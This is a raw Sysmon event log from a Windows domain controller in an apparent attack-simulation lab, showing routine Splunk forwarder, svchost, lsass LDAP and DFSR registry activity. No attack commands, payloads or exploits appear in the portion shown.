AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000011569Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:07.807{266CAFBE-66DB-6064-8701-00000000AE01}13645200C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011568Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:07.650{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-66DB-6064-8701-00000000AE01}1364C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011567Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:11:07.650{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011566Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:07.650{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011565Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:11:07.650{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011564Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:07.650{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011563Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:07.650{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-66DB-6064-8701-00000000AE01}1364C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011562Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:07.650{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-66DB-6064-8701-00000000AE01}1364C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000011561Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:07.651{266CAFBE-66DB-6064-8701-00000000AE01}1364C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000011560Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:07.541{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=604552C4951F1BADF8507C1808BB46ED,SHA256=8F365AD5AD364DA4B062D741F218CEC0136082C423FCEA3548CF3920F03CFD2D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000011559Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:05.505{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53733-false10.0.1.12-8000- 10341000x800000000000000011558Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:07.057{266CAFBE-66DA-6064-8601-00000000AE01}5228992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000011570Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:08.557{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B110C21179750ABB7082547090BFBA10,SHA256=F222CFB5EEE976DE358926A83186E9439C955EFD145B3305D650F4A1E2752EAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011579Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:09.603{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D7D464C7E3184F9F33FF0B276C8BF17,SHA256=B8C2AE4F466DEB84DEA52A19C0466161F612470554A1B9C0EDD1C22C78F5882E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011578Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:09.307{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-66DD-6064-8801-00000000AE01}3796C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011577Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:11:09.307{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011576Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:09.307{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011575Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:11:09.307{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011574Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:09.307{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011573Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:09.307{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-66DD-6064-8801-00000000AE01}3796C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011572Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:09.307{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-66DD-6064-8801-00000000AE01}3796C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000011571Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:09.307{266CAFBE-66DD-6064-8801-00000000AE01}3796C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000011580Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:10.666{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D41F6597B8AC813952CAFCF10591DECC,SHA256=A7F742ED793F68EAE56BDA79F71D02F726896BC78D425FF2DDBF8A0DAF4264AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011581Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:11.713{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE71927BA71EB9D201676BE6BFE82379,SHA256=2F61171671B2F695407800872813E21E02047F638E64E8804293589440B96E8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011583Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:12.759{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=494D9F3AB88CC89155B4C02CB7796EB6,SHA256=3D12D1BE9F1BF69FF2F7A8C20A285582561530E61AACFE03E10188358AFDFA57,IMPHASH=00000000000000000000000000000000falsetrue 
354300x800000000000000011582Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:10.631{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53734-false10.0.1.12-8000- 23542300x800000000000000011584Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:13.791{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6629D6E290E302BDC6D2F6931352AABF,SHA256=EA36C0F2F4A38C2B6D6B0215B4256ABAE63790524E9BE3E18D5A2D2A1FF87286,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011585Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:14.869{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9856AB7206C7089A630CFF630138FF59,SHA256=FDAC26AE9EB858F4CF869E72794A09E779E7E62FACDBD4269CFB296A02069034,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011593Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:15.915{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C3C0ACD48B44F474AF0FC8AAA464196,SHA256=DA7BD176F02E4AA1B80D9A714AD78D60134E98303F46D6546C679ACE5765CD43,IMPHASH=00000000000000000000000000000000falsetrue 
354300x800000000000000011592Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:14.584{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53735-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x800000000000000011591Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:14.584{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53735-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 13241300x800000000000000011590Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:11:15.212{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\69825A4F-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_69825A4F-0000-0000-0000-100000000000.XML 13241300x800000000000000011589Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:11:15.212{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\D1286CDE-9764-40EF-8307-AEB9B8BDF7DB\Config SourceDWORD (0x00000001) 13241300x800000000000000011588Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:11:15.212{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\D1286CDE-9764-40EF-8307-AEB9B8BDF7DB\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_D1286CDE-9764-40EF-8307-AEB9B8BDF7DB.XML 23542300x800000000000000011587Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:11:15.181{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7FDB88912528EC3773FBC41D75D7DB07,SHA256=17D6E9D139F71D15B888A537163DBF09439FE94F05E68530FCB3EBF121C9A033,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011586Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:15.181{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=144752BC0472DACA8D8774E8A17E7BEB,SHA256=43CE44012AC45F18C9587E3A6B7D7A220544259573A5567E691E87DD259560E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011606Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:16.946{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96840A49704F202F265C799BBEA0CB84,SHA256=5CFFDB53CD583387997CB1EDDEEB20AA18B30661DC33191DB456362D94069E62,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000011605Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:15.642{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53739-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000011604Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 